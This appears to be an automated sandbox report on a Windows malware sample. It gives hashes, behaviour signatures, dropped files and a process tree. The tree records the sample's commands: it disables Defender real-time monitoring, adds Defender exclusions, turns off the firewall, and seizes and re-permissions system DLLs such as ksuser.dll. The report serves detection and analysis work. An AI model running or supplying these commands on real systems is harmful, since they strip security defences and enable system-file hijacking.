Analysis

  • max time kernel
    140s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    06-11-2024 13:22

General

  • Target
    4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5.exe
  • Size
    125KB
  • MD5
    a293e528bd51b9d91da21e8cbfa8e5f5
  • SHA1
    c82ecf0733270f0807cb86bad5e1c0126284fd62
  • SHA256
    4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5
  • SHA512
    9223707eff3ac89eef7aed38d761926d4d17fafb1ff302ee35e5940fe30a3a7f478d5d59bb3c4864f4c25f2b34af2e769cea298826fdfe65f0c62009e879c020
  • SSDEEP
    3072:6KnT6V9P0IbarstiLniYqANZcfBuydIvRuX1FH4zUFluD:6m6VunedBuydVFH4zUF

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 14 IoCs
  • Modifies file permissions 1 TTPs 14 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5.exe
    "C:\Users\Admin\AppData\Local\Temp\4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2420
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1856
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2652
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dism /Online /enable-feature /FeatureName:"DirectPlay" /All
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\SysWOW64\Dism.exe
        dism /Online /enable-feature /FeatureName:"DirectPlay" /All
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2868
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll" /A
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant Administrators:(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2576
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant "Admin":(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2612
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:536
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2548
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1128
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1876
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:400
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1628
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1996
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1592
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2484
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1892

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize: 7KB
    MD5: 9097a720cc51c72f6bb72c9ca5e1d356
    SHA1: bf7e0aa6735a280d24e7641fe498b6f6f663f381
    SHA256: 7bf26e1e8abe4f3a205274e8be18b942770dc1aa11deea3dba9dd20178d55952
    SHA512: 6f543364c015523665599117410173b905ea2326ff0c7fd6d308dde08b6e5579e38b454d0e8594e9f8d5fbc059ccdc5988744ae3efdc08f5dc95aa0f643da44e

  • C:\Windows\SysWOW64\ksuser.dll
    Filesize: 118KB
    MD5: d5f3ecad923278e96bbbb6796f0bbca5
    SHA1: 9c54ba7de2d02306e3fcfa949163f10086c3ca3b
    SHA256: 447ae50e3e916b31ca861c97e9aab69301cec7ac9f1e527c07048ea7cba81807
    SHA512: 9c27b05c497ba2662b93092d848c02ae3cadc8096618df488371be03859dc701e3d167745507b23a017c4d35b96cf285642af75f13ee749bafa891d25c671e5a

  • memory/2420-4-0x0000000074101000-0x0000000074102000-memory.dmp
    Filesize: 4KB
  • memory/2420-5-0x0000000074100000-0x00000000746AB000-memory.dmp
    Filesize: 5.7MB
  • memory/2420-6-0x0000000074100000-0x00000000746AB000-memory.dmp
    Filesize: 5.7MB
  • memory/2420-7-0x0000000074100000-0x00000000746AB000-memory.dmp
    Filesize: 5.7MB
  • memory/2420-8-0x0000000074100000-0x00000000746AB000-memory.dmp
    Filesize: 5.7MB
  • memory/2420-9-0x0000000074100000-0x00000000746AB000-memory.dmp
    Filesize: 5.7MB
  • memory/3044-0-0x00000000011C0000-0x000000000121C000-memory.dmp
    Filesize: 368KB
  • memory/3044-1-0x0000000000030000-0x0000000000033000-memory.dmp
    Filesize: 12KB
  • memory/3044-26-0x0000000000030000-0x0000000000033000-memory.dmp
    Filesize: 12KB
  • memory/3044-27-0x00000000011C0000-0x000000000121C000-memory.dmp
    Filesize: 368KB